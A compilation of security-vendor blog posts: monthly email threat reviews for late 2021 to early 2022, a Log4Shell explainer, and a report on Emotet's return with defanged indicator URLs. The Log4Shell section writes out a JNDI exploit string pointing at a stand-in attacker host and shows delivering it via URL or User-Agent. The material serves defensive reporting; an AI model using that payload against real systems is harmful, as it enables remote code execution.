Executive Summary

• Hornetsecurity registered an increase in threat emails during February 2022.
• URL-based email and phishing attacks continue to be significant.
• With 47.1 % of impersonated brands, LinkedIn has been the most impersonated brand in ongoing phishing campaigns.

Summary

In this installment of our monthly email threat review, we present an overview of the email-based threats observed in February 2022 and compare them to the previous month’s threats.

The report provides insights into:

• Unwanted emails by category
• File types used in attacks
• Industry Email Threat Index
• Attack techniques
• Impersonated company brands and organizations

Unwanted emails by category

The following table shows the distribution of unwanted emails per category.

The following time histogram shows the email volume per category per day.

The spike in rejected emails starting on 2022-02-16 can be attributed to a large-scale reoccurring sextortion email scam campaign in the German language. This campaign then transitioned to the Dutch language on 2022-02-24. Parallel to these campaigns, we also registered more threat emails.

Methodology

The listed email categories correspond to the email categories listed in the Email Live Tracking of Hornetsecurity’s Control Panel. So our users are already familiar with them. For others, the categories are:

File types used in attacks

The following table shows the distribution of file types used in attacks.

The following histogram shows the email volume per file type used in attacks per seven days.

There has been a decline in email attacks using HTML documents for either payload delivery or credential phishing compared to previous ones. Instead, attacks using archive files, e.g., ZIP documents, to encapsulate malicious script files and other executables were on the rise. The increase of malicious Excel documents from 10 % to 12.4 % can be attributed to Emotet activity, which currently uses malicious Excel documents as an infection vector.

Industry Email Threat Index

The following table shows our Industry Email Threat Index calculated based on the number of threat emails compared to each industry’s clean emails (in median).

The following bar chart visualizes the email-based threat posed to each industry.

Overall our email threat index increased over all industries. The top four industries’ positions remain unchanged. However, the threat index of the research industry rose the most out of all the observed industries. While the threat index of the research industry increased from 6.8 % to 10.5 %, the threat index of the entertainment industry only rose from 6.4 % to 7.3 %. The threat index of the healthcare industry increased from 5.3 % to 7.3 %.

Methodology

Different (sized) organizations receive a different absolute number of emails. Thus, we calculate the percent share of threat emails from each organization’s threat and clean emails to compare organizations. We then calculate the median of these percent values for all organizations within the same industry to form the industry’s final threat score.

Attack techniques

The following table shows the attack techniques used in attacks.

The following histogram shows the email volume per attack technique used per hour.

Impersonated company brands and organizations

The following table shows which company brands and organizations our systems detected most in impersonation attacks.

The following histogram shows the email volume for company brands and organizations detected in impersonation attacks per hour.

LinkedIn was impersonated in several phishing campaigns this month.

Additionally, we detected the continuation of the phishing campaigns against German banks, namely Volks- und Raiffeisenbank, Sparkasse, and Postbank.

Summary

In this installment of our monthly email threat review, we present an overview of the email-based threats observed in January 2022 and compare them to the previous month’s threats.

The report provides insights into:

• Unwanted emails by category
• File types used in attacks
• Industry Email Threat Index
• Attack techniques
• Impersonated company brands and organizations

Unwanted emails by category

The following table shows the distribution of unwanted emails per category.

The following time histogram shows the email volume per category per day.

Methodology

The listed email categories correspond to the email categories listed in the Email Live Tracking of Hornetsecurity’s Control Panel. So our users are already familiar with them. For others, the categories are:

File types used in attacks

The following table shows the distribution of file types used in attacks.

There is an increase in HTML attachments used in attacks from 22.8 % to 38.9 % from last month.

Industry Email Threat Index

The following table shows our Industry Email Threat Index calculated based on the number of threat emails compared to each industry’s clean emails (in median).

The following bar chart visualizes the email-based threat posed to each industry.

The research industry’s threat emails share increased from 4.1 % to 6.8 % last month. Making the research industry again the industry most threatened by email attacks.

The global median threat email share over all companies regardless of industry increased from 3.2 % to 3.7 %. This indicates that the increase in threat email share targeting the research industry is higher than the overall increase in threat email share.

Methodology

Different (sized) organizations receive a different absolute number of emails. Thus, we calculate the percent share of threat emails from each organization’s threat and clean emails to compare organizations. We then calculate the median of these percent values for all organizations within the same industry to form the industry’s final threat score.

Attack techniques

The following table shows the attack techniques used in attacks.

The following time histogram shows the email volume per attack technique used per hour.

The increase in URL-based attacks from last month’s 7.3 % to 10.1 % can be attributed to Emotet URL-based malspam campaigns.

Impersonated company brands and organizations

The following table shows which company brands and organizations our systems detected most in impersonation attacks.

The following histogram shows the email volume for company brands and organizations detected in impersonation attacks per hour.

In September 2021, we first reported a large-scale phishing campaign that mimicked emails from German banks. Since then, the campaign has been ongoing. This month the campaign focused heavily on the Volks- und Raiffeisenbank brand. Consequently, the brand has been the most impersonated brand of January 2022. It attributed to 61.2% of all brand impersonation attacks.

Summary

In this installment of our monthly email threat review, we present an overview of the email-based threats observed in December 2021 and compare them to the previous month’s threats.

The report provides insights into:

• Unwanted emails by category
• File types used in attacks
• Industry Email Threat Index
• Attack techniques
• Impersonated company brands and organizations

Unwanted emails by category

The following table shows the distribution of unwanted emails per category.

The following time histogram shows the email volume per category per day.

Readers of our previous reports likely already guessed that the spike in rejected emails at the start of December can be attributed to a large-scale monthly re-occurring sextortion scam spam campaign targeting German-speaking victims.

Methodology

The listed email categories correspond to the email categories listed in the Email Live Tracking of Hornetsecurity’s Control Panel. So our users are already familiar with them. For others, the categories are:

File types used in attacks

The following table shows the distribution of file types used in attacks.

The distribution of file types in attacks using attachments is virtually the same as in previous months.

Industry Email Threat Index

The following table shows our Industry Email Threat Index calculated based on the number of threat emails compared to each industry’s clean emails received (in median).

The following bar chart visualizes the email-based threat posed to each industry.

The research industry threat index has dropped from 6.0 to 4.1. Further, the Hospitality industry made it into the top 10. This is likely due to targeting criminals who know that other industries will have reduced email traffic due to the holidays, making it harder for threat emails to blend in, while the hospitality industry (hotels, restaurants, etc.) has increased business over the holidays.

Methodology

Different (sized) organizations receive a different absolute number of emails. Thus, we calculate the percent share of threat emails from each organization’s threat and clean emails to compare organizations. We then calculate the median of these percent values for all organizations within the same industry to form the industry’s final threat score.

Attack techniques

The following table shows the attack techniques used in attacks.

The following histogram shows the email volume per attack technique used per hour.

Impersonated company brands and organizations

The following table shows which company brands and organizations our systems detected most in impersonation attacks.

The following histogram shows the email volume for company brands and organizations detected in impersonation attacks per hour.

On 2021-12-05, the long-running large-scale phishing campaign against the two German banking associations, Sparkasse and Volks- und Raiffeisenbanken also targeted the German Postbank. The emails use the same lure as the campaigns we previously reported on. The user is informed about an alleged change at the bank concerning the European Payment Services Directive 2 (PSD2). The user is requested to review and confirm the changes to their data.

Emotet Christmas campaign

Emotet is known for sending campaigns for specific seasonal events. We previously reported on Emotet’s Halloween campaign. Emotet also sent threat emails this Christmas.

The emails were very primitive and only featured one link.

As usual, the link in the email downloads an Office document which malicious macro code downloads and executes the Emotet malware.

Executive Summary

• November 2021 marked the return of Emotet after the botnet was taken down by law enforcement in January 2021.

Summary

In this installment of our monthly email threat review, we present an overview of the email-based threats observed in November 2021 and compare them to the previous month’s threats.

The report provides insights into:

• Unwanted emails by category
• File types used in attacks
• Industry Email Threat Index
• Attack techniques
• Impersonated company brands and organizations
• Return of Emotet

Unwanted emails by category

The following table shows the distribution of unwanted emails per category.

The following time histogram shows the email volume per category per day.

Methodology

The listed email categories correspond to the email categories listed in the Email Live Tracking of Hornetsecurity’s Control Panel. So our users are already familiar with them. For others, the categories are:

File types used in attacks

The following table shows the distribution of file types used in attacks.

The following histogram shows the email volume per file type used in attacks per 7 days.

Industry Email Threat Index

The following table shows our Industry Email Threat Index calculated based on the number of threat emails compared to each industry’s clean emails received (in median).

The following bar chart visualizes the email-based threat posed to each industry.

Methodology

Different (sized) organizations receive a different absolute number of emails. Thus, we calculate the percent share of threat emails from each organization’s threat and clean emails to compare organizations. We then calculate the median of these percent values for all organizations within the same industry to form the industry’s final threat score.

Attack techniques

The following table shows the attack techniques used in attacks.

The following histogram shows the email volume per attack technique used per hour.

Impersonated company brands and organizations

The following table shows which company brands and organizations our systems detected most in impersonation attacks.

The following histogram shows the email volume for company brands and organizations detected in impersonation attacks per hour.

It clearly shows the continued campaigns against German banks Sparkasse and Volks- und Raiffeisenbank that started at the end of September 2021.

Return of Emotet

On 2021-11-15, computer systems infected with the TrickBot malware started downloading and installing the Emotet malware. Subsequently, the Emotet botnet was rebuilt and sent malspam from its botnet again. We reported this event in a separate blogpost.

Background

CVE-2021-44228, also known as Log4Shell, is a vulnerability in the popular Java logging package log4j.

Log4j is used by a lot of JAVA enterprise software to implement logging. The vulnerability is caused by a feature released in 2013 that added an expansion of (local environment) variables in log messages. For example, `${env:FOOBAR}` in a log message would expand to the environment variable `FOOBAR`. It also allows expanding variables in the JNDI (Java Naming and Directory Interface) context. This is were the vulnerability manifests. If the string `${jndi:ldap://attacker-controlled.com/x}` is logged via log4j, the system will request the attacker-controlled URI via the JAVA Naming and Directory Interface (JNDI), and then download and execute any attacker-controlled JAVA class file leading to a remote code execution vulnerability.

Attack procedure

The vulnerability is so dangerous because it is so simple to exploit: all an attacker has to do is get a victim to enter their exploit string `${jndi:ldap://attacker-controlled.com/x}` into a log file using log4j. log4j is virtually the default logging library for JAVA enterprise applications, making them vulnerable to CVE-2021-44228. Most applications log specific actions by default, e.g., a web server will log web requests. An attacker would simply need to request the URL `http://vulnerable-webserver.com/${jndi:ldap://attacker-controlled.com/x}` or set their User-Agent string to the exploit in order to compromise a system.

The exploit string can travel via any path, as long as it gets logged by a JAVA application using log4j, e.g., a JAVA-based email client could receive an email where the subject of the email is set to the Log4Shell exploit string. Once the JAVA-base email client writes to its logs via the log4j library that it has received a new email, the exploit would trigger.

Hornetsecurity Statement

Hornetsecurity already detects the malicious exploit string in emails, but so far has not observed attackers using emails directly as attack vectors. The cases that have been observed so far (besides security companies and customers testing for the vulnerability), come from web forms containing the Log4Shell exploit, for which the owner of the web form then received a notification email containing the fields of the form, which then obviously contained the exploit string.

Hornetsecurity is monitoring emails for CVE-2021-44228 exploitation patterns and will constantly expand detection to adapt to new obfuscations in preparation for potential targeted email campaigns using the Log4Shell exploit.

References

• BSI: https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.html
• CISA:https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability

Summary

Hornetsecurity observes that the Emotet botnet became active after its shut down in January 2021. Hornetsecurity’s Security Lab already identified new Emotet malspam campaigns in the wild.

Background

Emotet (also known as Heodo) was first observed in 2014. It was a banking trojan stealing banking details and banking login credentials from victims. But it pivoted to a malware-as-a-service (MaaS) operation providing malware distribution services to other cybercriminals. Today, Emotet is probably the most prolific malware distribution operation. To this end, it steals the emails of its victims and replies to the victim’s previous conversations. This is known as email conversation thread hijacking.⁵ Hornetsecurity has written numerous blogposts about Emotet.^2,3,4,5,6,7

On 2021-01-27, Europol announced that an international worldwide coordinated law enforcement and judicial action had disrupted the Emotet botnet, and investigators have taken control of Emotet’s infrastructure. The Emotet botnet was subsequently shut down by law enforcement.⁸

The comeback

On 2021-11-15, TrickBot malware was installed via malspam, downloaded, and installed the Emotet malware. Subsequently, the Emotet botnet was rebuilt and started to send malspam from its botnet again.

They send different malicious documents (XLSM and DOCM).

In some cases, the malicious documents were also placed in encrypted ZIP archives. The passwords were in plain text in the emails.

As already stated, Emotet used email conversation thread hijacking⁵, meaning it steals the emails of its victims and then replies (often even from the victim’s account) to exiting email conversations quoting the previous conversation in the email. This makes victims very susceptible to these Emotet emails.

Countermeasures

Hornetsecurity’s technical defense mechanisms do not get fooled by social engineering techniques such as the employed email conversation thread hijacking.

Hornetsecurity’s Advanced Threat Protection combats the Emotet threat with the following features:

• Malicious document decryption can use the password listed in the email to decrypt the encrypted ZIP archives.
• Hornetsecurity’s ATP sandbox will detect the malicious documents (even if previously unknown).

With the details mentioned above, we strictly recommend our Advanced Threat Protection services for adequate protection against sophisticated adversaries such as Emotet, who may change their attack patterns at any given time. Signatures for known malicious Emotet documents will be added to Hornetsecurity’s Spam and Malware Protection also to protect customers that do not have ATP services booked.

References

• ¹ https://www.hornetsecurity.com/en/security-information/email-conversation-thread-hijacking/
• ² https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/
• ³ https://www.hornetsecurity.com/en/security-information/emotet-is-back/
• ⁴ https://www.hornetsecurity.com/en/security-information/webshells-powering-emotet/
• ⁵ https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/
• ⁶ https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/
• ⁷ https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/
• ⁸ https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/

Indicators of Compromise (IOCs)

URLs

• http[:]//ranvipclub[.]net/pvhko/a/
• http[:]//devanture[.]com[.]sg/wp-includes/XBByNUNWvIEvawb68/
• http[:]//av-quiz[.]tk/wp-content/k6K/
• https[:]//team.stagingapps[.]xyz/wp-content/aPIm2GsjA/
• https[:]//newsmag.danielolayinkas[.]com/content/nVgyRFrTE68Yd9s6/
• https[:]//goodtech.cetxlabs[.]com/content/5MfZPgP06/
• http[:]//visteme[.]mx/shop/wp-admin/PP/